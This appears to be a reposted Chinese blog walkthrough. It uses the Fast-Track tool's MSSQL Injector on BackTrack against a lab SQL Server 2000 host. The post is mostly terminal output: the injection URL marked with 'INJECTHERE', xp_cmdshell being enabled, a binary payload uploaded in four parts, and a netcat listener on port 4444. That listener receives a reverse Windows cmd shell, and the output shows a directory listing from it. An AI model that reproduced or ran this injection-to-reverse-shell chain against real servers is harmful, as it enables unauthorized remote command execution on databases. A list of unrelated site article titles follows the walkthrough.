MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
来源:互联网 发布:淘宝钛锗手链 编辑:程序博客网 时间:2024/06/03 09:22
fasttrack操作:
root@bt:~# cd /pentest/exploits/fasttrack/root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i****************************************************** Performing dependency checks... ********************************************************* FreeTDS and PYMMSQL are installed. (Check) ****** PExpect is installed. (Check) ****** ClientForm is installed. (Check) ****** Psyco is installed. (Check) ****** Beautiful Soup is installed. (Check) ***Also ensure ProFTP, WinEXE, and SQLite3 is installed fromthe Updates/Installation menu.Your system has all requirements needed to run Fast-Track! ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Fast-Track Main Menu: 1. Fast-Track Updates 2. Autopwn Automation 3. Nmap Scripting Engine 4. Microsoft SQL Tools 5. Mass Client-Side Attack 6. Exploits 7. Binary to Hex Payload Converter 8. Payload Generator 9. Fast-Track Tutorials 10. Fast-Track Changelog 11. Fast-Track Credits 12. Exit Fast-Track Enter the number: 4 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Microsoft SQL Attack Tools 1. MSSQL Injector 2. MSSQL Bruter 3. SQLPwnage (q)uit Enter your choice : 1 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** *****************************************************************Enter which SQL Injector you want to use: 1. SQL Injector - Query String Parameter Attack 2. SQL Injector - POST Parameter Attack 3. SQL Injector - GET FTP Payload Attack 4. SQL Injector - GET Manual Setup Binary Payload Attack (q)uit Enter your choice: 1 ***************************************************************** ** ** ** Fast-Track - A new beginning... ** ** Version: 4.0.2 ** ** Written by: David Kennedy (ReL1K) ** ** Lead Developer: Joey Furr (j0fer) ** ** http://www.secmaniac.com ** ** ** ***************************************************************** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Requirements: PExpect ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module uses a reverse shell by using the binary2hex method for uploading. It does not require FTP or any other service, instead we are using the debug function in Windows to generate the executable. You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE So for example, when the tool asks you for the SQL Injectable URL, type: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah <ctrl>-c to exit to Main Menu... Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated. Use the subprocess module. ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null') Sending initial request to enable xp_cmdshell if disabled.... Sending first portion of payload (1/4).... Sending second portion of payload (2/4).... Sending third portion of payload (3/4)... Sending the last portion of the payload (4/4)... Running cleanup before executing the payload... Running the payload on the server... You should have a shell if everything went good..Might take a couple seconds另外起一个bash,来运行nc:
root@bt:~# nc -l -p 4444
当fasttrack出现:
Running the payload on the server...
时,nc就连上了:
root@bt:~# nc -l -p 4444Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\WINDOWS\system32>cd ..cd ..C:\WINDOWS>cd ..cd ..C:\>dirdir 驱动器 C 中的卷没有标签。 卷的序列号是 3052-FA52 C:\ 的目录2012-03-24 11:55 0 AUTOEXEC.BAT2012-03-24 11:55 0 CONFIG.SYS2012-03-24 11:59 <DIR> Documents and Settings2013-07-02 21:45 <DIR> msf32012-08-07 03:10 176,204,554 msf3.zip2004-12-29 13:07 61,440 nc.exe2013-07-01 22:45 <DIR> Program Files2013-05-01 22:15 16,232,448 python-2.7.4.msi2013-07-06 17:57 <DIR> Python272013-04-07 21:03 70,402,968 SQL2000SP4.exe2013-06-30 21:58 <DIR> SQL2KSP42013-06-30 21:53 <DIR> SQLEVAL2011-03-22 17:38 349,280,992 sqleval.exe2013-07-01 20:52 <DIR> WINDOWS2013-05-22 20:55 20,868,704 Wireshark-win32-1.8.7.exe 8 个文件 633,051,106 字节 7 个目录 3,919,802,368 可用字节C:\>exitexitroot@bt:~#
- MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
- MSSQL2K - SQL Injector - Query String Parameter Attack获得反向cmdshell
- MSSQL2K - SQL Injector - Query String Parameter Attack
- SQL Injector - POST Parameter Attack
- netcat获得反向shell
- SQL Injector - GET Manual Setup Binary Payload Attack
- Form Query String Parameter Tool
- 反向连接打开cmdshell
- linux下编译netcat并且反弹cmdshell
- 使用VC#轻松制作SQL CmdShell
- sql server cmdshell组件启用命令
- Security -- Format string attack
- @Injector
- SQL Injection Attack
- SQL injection attack
- Elasticsearch Query String Query
- Query String Query【官网】
- Query参数parameter的操作
- CSS总结
- nefu 2 打素数表
- ASP.NET产生随机验证码
- iOS 学习笔记 8 NSUserDefaults学习
- C的xml编程文章链接
- MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
- Java语法总结 - 数组
- signapk流程分析
- UIButton,设置为UIButtonTypeCustom类型时,做圆角效果
- Java语法总结 - 字符串
- hdu 1166——敌兵布阵 (线段树)
- 我的梦想
- linux多线程----信号量
- JavaScript语言灵活性
